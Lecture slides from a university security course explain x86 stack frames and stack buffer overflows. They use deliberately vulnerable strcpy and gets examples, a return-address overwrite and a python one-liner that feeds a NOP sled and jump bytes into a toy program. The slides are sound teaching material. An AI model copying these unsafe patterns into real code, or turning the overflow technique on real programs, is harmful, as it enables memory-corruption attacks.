Lecture 03 Control Flow Stephen Checkoway University of Illinois - - PowerPoint PPT Presentation

lecture 03 control flow
SMART_READER_LITE
LIVE PREVIEW

Lecture 03 Control Flow Stephen Checkoway University of Illinois - - PowerPoint PPT Presentation

Jan 20, 2024 301 likes •838 views

Lecture 03 Control Flow Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Adapted from Michael Baileys ECE 422 Outline Computer CPU Instructions The Stack (x86) What is a stack How it is

slide-1
SLIDE 1

Lecture 03 – Control Flow

Stephen Checkoway University of Illinois at Chicago CS 487 – Fall 2017 Adapted from Michael Bailey’s ECE 422

slide-2
SLIDE 2

Outline

  • Computer

– CPU – Instructions

  • The Stack (x86)

– What is a stack – How it is used by programs – Technical details

  • Attacks
  • Buffer overflows
  • Adapted from Aleph One’s “Smashing the Stack for Fun

and Profit”

slide-3
SLIDE 3

“Insecurity”?

Level-2 Problem: “Weakness”

Factors that predispose systems to vulnerability

Level-1 Problem: “Vulnerability”

Specific errors that could be exploited in an assault.

Level-0 Problem: “Exploit”

Actual malicious attempt to cause harm.

“Attack”

exploit, vulnerabilities are ingredients

slide-4
SLIDE 4

Why Study Attacks?

  • Identify vulnerabilities so they can be fixed.
  • Create incentives for vendors to be careful.
  • Learn about new classes of threats.

– Determine what we need to defend against. – Help designers build stronger systems. – Help users more accurately evaluate risk.

slide-5
SLIDE 5

static OSStatus SSLVerifySignedServerKeyExchange(SSLContext *ctx, bool isRsa, SSLBuffer signedParams, uint8_t *signature, UInt16 signatureLen) { OSStatus err; ... if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0) goto fail; if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0) goto fail; goto fail; if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0) goto fail; ... fail: SSLFreeBuffer(&signedHashes); SSLFreeBuffer(&hashCtx); return err; }

slide-6
SLIDE 6

example.c

void foo(int a, int b) { char buf1[10]; } void main() { foo(3,6); }

slide-7
SLIDE 7

C stack frames

} main

Local variables SP FP

slide-8
SLIDE 8

C stack frames

} main

Local variables function args SP FP

slide-9
SLIDE 9

C stack frames

} main

Local variables function args return address SP FP

slide-10
SLIDE 10

C stack frames

} main

Local variables function args return address

} foo

SP main’s FP FP

slide-11
SLIDE 11

C stack frames

} main

Local variables function args return address

} foo

SP main’s FP FP

slide-12
SLIDE 12

C stack frames

} main

Local variables function args return address

} foo

SP main’s FP Local variables FP

slide-13
SLIDE 13

C stack frames (x86 specific)

Grows toward lower address Starts ~end of VA space Two related registers %ESP - Stack Pointer %EBP - Frame Pointer

Low address 0x00 High address 0xff

slide-14
SLIDE 14

example.c

void foo(int a, int b) { char buf1[16]; } int main() { foo(3,6); }

slide-15
SLIDE 15

example.s (x86)

main: pushl %ebp movl %esp, %ebp subl $8, %esp movl $6, 4(%esp) movl $3, (%esp) call foo leave ret

prev FP

slide-16
SLIDE 16

example.s (x86)

main: pushl %ebp movl %esp, %ebp subl $8, %esp movl $6, 4(%esp) movl $3, (%esp) call foo leave ret

prev FP

slide-17
SLIDE 17

example.s (x86)

main: pushl %ebp movl %esp, %ebp subl $8, %esp movl $6, 4(%esp) movl $3, (%esp) call foo leave ret

prev FP

slide-18
SLIDE 18

example.s (x86)

main: pushl %ebp movl %esp, %ebp subl $8, %esp movl $6, 4(%esp) movl $3, (%esp) call foo leave ret

prev FP 6

slide-19
SLIDE 19

example.s (x86)

main: pushl %ebp movl %esp, %ebp subl $8, %esp movl $6, 4(%esp) movl $3, (%esp) call foo leave ret

prev FP 6 3

slide-20
SLIDE 20

example.s (x86)

main: pushl %ebp movl %esp, %ebp subl $8, %esp movl $6, 4(%esp) movl $3, (%esp) call foo leave ret

prev FP 6 3 return

slide-21
SLIDE 21

example.s (x86)

foo: pushl %ebp movl %esp, %ebp subl $16, %esp leave ret prev FP 6 3 return main FP

slide-22
SLIDE 22

example.s (x86)

foo: pushl %ebp movl %esp, %ebp subl $16, %esp leave ret prev FP 6 3 return main FP

slide-23
SLIDE 23

example.s (x86)

foo: pushl %ebp movl %esp, %ebp subl $16, %esp leave ret prev FP 6 3 return main FP

slide-24
SLIDE 24

example.s (x86)

foo: pushl %ebp movl %esp, %ebp subl $16, %esp leave ret prev FP 6 3 return main FP

mov %ebp, %esp pop %ebp

slide-25
SLIDE 25

example.s (x86)

foo: pushl %ebp movl %esp, %ebp subl $16, %esp leave ret prev FP 6 3 return main FP

mov %ebp, %esp pop %ebp

slide-26
SLIDE 26

example.s (x86)

foo: pushl %ebp movl %esp, %ebp subl $16, %esp leave ret prev FP 6 3 return

mov %ebp, %esp pop %ebp

slide-27
SLIDE 27

example.s (x86)

foo: pushl %ebp movl %esp, %ebp subl $16, %esp leave ret prev FP 6 3 return

mov %ebp, %esp pop %ebp

slide-28
SLIDE 28

example.s (x86)

main: pushl %ebp movl %esp, %ebp subl $8, %esp movl $6, 4(%esp) movl $3, (%esp) call foo leave ret

prev FP 6 3

mov %ebp, %esp pop %ebp

slide-29
SLIDE 29

example.s (x86)

main: pushl %ebp movl %esp, %ebp subl $8, %esp movl $6, 4(%esp) movl $3, (%esp) call foo leave ret

prev FP

mov %ebp, %esp pop %ebp

slide-30
SLIDE 30

example.s (x86)

main: pushl %ebp movl %esp, %ebp subl $8, %esp movl $6, 4(%esp) movl $3, (%esp) call foo leave ret

mov %ebp, %esp pop %ebp

slide-31
SLIDE 31

Buffer overflow example

void foo(char *str) { char buffer[16]; strcpy(buffer, str); } int main() { char buf[256]; memset(buf, ‘A’, 255); buf[255] = ‘\x00’; foo(buf); }

slide-32
SLIDE 32

Buffer overflow example

void foo(char *str) { char buffer[16]; strcpy(buffer, str); } int main() { char buf[256]; memset(buf, ‘A’, 255); buf[255] = ‘\x00’; foo(buf); }

slide-33
SLIDE 33

Buffer overflow example

void foo(char *str) { char buffer[16]; strcpy(buffer, str); } int main() { char buf[256]; memset(buf, ‘A’, 255); buf[255] = ‘\x00’; foo(buf); }

AAAAAAA… prev FP

slide-34
SLIDE 34

Buffer overflow example

void foo(char *str) { char buffer[16]; strcpy(buffer, str); } int main() { char buf[256]; memset(buf, ‘A’, 255); buf[255] = ‘\x00’; foo(buf); }

AAAAAAA… prev FP foo_arg1

slide-35
SLIDE 35

Buffer overflow example

void foo(char *str) { char buffer[16]; strcpy(buffer, str); } int main() { char buf[256]; memset(buf, ‘A’, 255); buf[255] = ‘\x00’; foo(buf); }

AAAAAAA… prev FP foo_arg1 return

slide-36
SLIDE 36

Buffer overflow example

void foo(char *str) { char buffer[16]; strcpy(buffer, str); } int main() { char buf[256]; memset(buf, ‘A’, 255); buf[255] = ‘\x00’; foo(buf); }

AAAAAAA… prev FP foo_arg1 return main FP

slide-37
SLIDE 37

Buffer overflow example

void foo(char *str) { char buffer[16]; strcpy(buffer, str); } int main() { char buf[256]; memset(buf, ‘A’, 255); buf[255] = ‘\x00’; foo(buf); }

AAAAAAA… prev FP foo_arg1 return main FP

slide-38
SLIDE 38

Buffer overflow example

void foo(char *str) { char buffer[16]; strcpy(buffer, str); } int main() { char buf[256]; memset(buf, ‘A’, 255); buf[255] = ‘\x00’; foo(buf); }

AAAAAAA… prev FP 0x41414141 0x41414141 0x41414141 AAAAAAA…

slide-39
SLIDE 39

Buffer overflow example

void foo(char *str) { char buffer[16]; strcpy(buffer, str); } int main() { char buf[256]; memset(buf, ‘A’, 255); buf[255] = ‘\x00’; foo(buf); }

AAAAAAA… prev FP 0x41414141 0x41414141 0x41414141 AAAAAAA…

mov %ebp, %esp pop %ebp ret

slide-40
SLIDE 40

AAAAAA…

Buffer overflow example

void foo(char *str) { char buffer[16]; strcpy(buffer, str); } int main() { char buf[256]; memset(buf, ‘A’, 255); buf[255] = ‘\x00’; foo(buf); }

AAAAAAA… prev FP 0x41414141 0x41414141 0x41414141

mov %ebp, %esp pop %ebp ret

slide-41
SLIDE 41

AAAAAA…

Buffer overflow example

void foo(char *str) { char buffer[16]; strcpy(buffer, str); } int main() { char buf[256]; memset(buf, ‘A’, 255); buf[255] = ‘\x00’; foo(buf); }

0x41414141 AAAAAAA… prev FP 0x41414141 0x41414141

mov %ebp, %esp pop %ebp ret

?

slide-42
SLIDE 42

AAAAAA…

Buffer overflow example

void foo(char *str) { char buffer[16]; strcpy(buffer, str); } int main() { char buf[256]; memset(buf, ‘A’, 255); buf[255] = ‘\x00’; foo(buf); }

0x41414141 0x41414141 AAAAAAA… prev FP 0x41414141

mov %ebp, %esp pop %ebp ret

?

slide-43
SLIDE 43

AAAAAA…

Buffer overflow example

%eip = 0x41414141 ???

0x41414141 0x41414141 AAAAAAA… prev FP 0x41414141

?

slide-44
SLIDE 44

Buffer overflow FTW

  • Success! Program crashed!
  • Can we do better?

– Yes

  • How?
slide-45
SLIDE 45

Exploiting buffer overflows

void foo(char *str) { char buffer[16]; strcpy(buffer, str); } int main() { char buf[256]; memset(buf, ‘A’, 255); buf[255] = ‘\x00’; ((int*)buf)[5] = (int)buf; foo(buf); }

slide-46
SLIDE 46

Exploiting buffer overflows

void foo(char *str) { char buffer[16]; strcpy(buffer, str); } int main() { char buf[256]; memset(buf, ‘A’, 255); buf[255] = ‘\x00’; ((int*)buf)[5] = (int)buf; foo(buf); }

AAAAAAA… prev FP 0x41414141 buf 0x41414141 AAAAAAA…

slide-47
SLIDE 47

AAAAAAA…

Exploiting buffer overflows

void foo(char *str) { char buffer[16]; strcpy(buffer, str); } int main() { char buf[256]; memset(buf, ‘A’, 255); buf[255] = ‘\x00’; ((int*)buf)[5] = (int)buf; foo(buf); }

AAAAAAA… prev FP 0x41414141 buf 0x41414141

mov %ebp, %esp pop %ebp ret

slide-48
SLIDE 48

AAAAAAA…

Exploiting buffer overflows

void foo(char *str) { char buffer[16]; strcpy(buffer, str); } int main() { char buf[256]; memset(buf, ‘A’, 255); buf[255] = ‘\x00’; ((int*)buf)[5] = (int)buf; foo(buf); }

0x41414141 AAAAAAA… prev FP 0x41414141 buf

mov %ebp, %esp pop %ebp ret

slide-49
SLIDE 49

AAAAAAA…

Exploiting buffer overflows

void foo(char *str) { char buffer[16]; strcpy(buffer, str); } int main() { char buf[256]; memset(buf, ‘A’, 255); buf[255] = ‘\x00’; ((int*)buf)[5] = (int)buf; foo(buf); }

buf 0x41414141 AAAAAAA… prev FP 0x41414141

mov %ebp, %esp pop %ebp ret

slide-50
SLIDE 50

What’s the Use?

  • If you control the source?
  • If you run the program?
  • If you control the inputs?
slide-51
SLIDE 51

(slightly) more realistic vulnerability

int main() { char buffer[100]; printf("Enter name: "); gets(buffer); printf("Hello, %s!\n", buffer); }

slide-52
SLIDE 52

(slightly) more realistic vulnerability

int main() { char buffer[100]; printf("Enter name: "); gets(buffer); printf("Hello, %s!\n", buffer); } python –c “print ‘\x90’*110 + \ ‘\xeb\xfe’ + ‘\x00\xd0\xff\xff’” | \ ./a.out